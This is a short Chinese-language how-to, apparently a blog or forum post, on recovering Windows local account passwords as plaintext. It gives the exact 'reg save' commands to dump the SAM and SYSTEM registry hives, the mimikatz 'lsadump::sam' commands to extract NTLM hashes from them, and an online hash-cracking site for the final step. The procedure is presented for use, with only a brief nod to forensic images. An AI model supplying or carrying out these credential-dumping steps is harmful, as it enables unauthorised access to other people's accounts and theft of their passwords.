破解Windows本地账户密码(拿到明文密码)
1.导出sam和system文件
以管理员身份运行CMD命令行工具
输入:
reg save hklm\sam sam.hive (本机密码)
reg save hklm\system system.hive (本机密码)
导出路径为当前目录
PE模式下(win预安装模式)或直接连接硬盘找 C:\windows\system32\config\sam和system文件
取证镜像模式下 找镜像文件下 C:\windows\system32\config\sam和system文件
2.读取sam和system文件获取Hash NTLM加密后的密码
mimikatz(实战工具有被杀的风险)(完整用法自行百度,我也不知道)
把sam.hive system.hive 或 sam system文件放在mimikatz.exe 同一目录下
以管理员身份运行mimikatz.exe
输入:
lsadump::sam /sam:sam.hive /system:system.hive
或
lsadump::sam /sam:sam /system:system
(主要看导出的sam和system文件是那种方法)
得到Hash NTLM加密后的密码
3.在线网站在线破解密码例如:www.cmd5.com 拿到明文密码
结束